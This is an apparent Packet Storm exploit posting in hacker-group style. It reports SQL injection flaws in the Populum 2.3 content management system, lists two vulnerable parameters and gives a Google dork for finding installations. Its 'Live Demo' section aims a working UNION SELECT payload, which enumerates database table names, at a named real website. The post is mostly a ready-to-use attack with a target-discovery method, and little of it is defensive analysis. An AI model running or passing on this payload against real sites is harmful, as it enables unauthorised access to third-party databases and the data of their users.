Populum version 2.3 suffers from a remote SQL injection vulnerability.
b684882031f381066d70dec5f2d8556e::::::::::::::ProUd to Be InDiaN::::::::::::::
~AuthoR : -[SiLeNtp0is0n]-
~Vuln. App : Populum version 2.3
~App Detail : Content management software for hybrid blog/media/commerce communities
~VuLneraBiLity : SQL injection
~DoRk : "Powered by Populum"
~My HoMe : www.andhrahackers.com
~gReetZ : Mr.XXXX ShRushe tRif0Rce h3LLb0y bRonRiC
~SpL gReetZ : TeamICW
:::::::::::::::::::::::::::::::::::::::::::::::
Vulnerable :
127.0.0.1/populum/diarypage.php?did=[SQL injection]
127.0.0.1/populum/link.php?id=[SQL injection]
:::::::::::::::::::::::::::::::::::::::::::::::
Live Demo :
http://www.opednews.com/populum/diarypage.php?did=15458+and+1=2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=database()--
:::::::::::::::::::::::::::::::::::::::::::::::
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!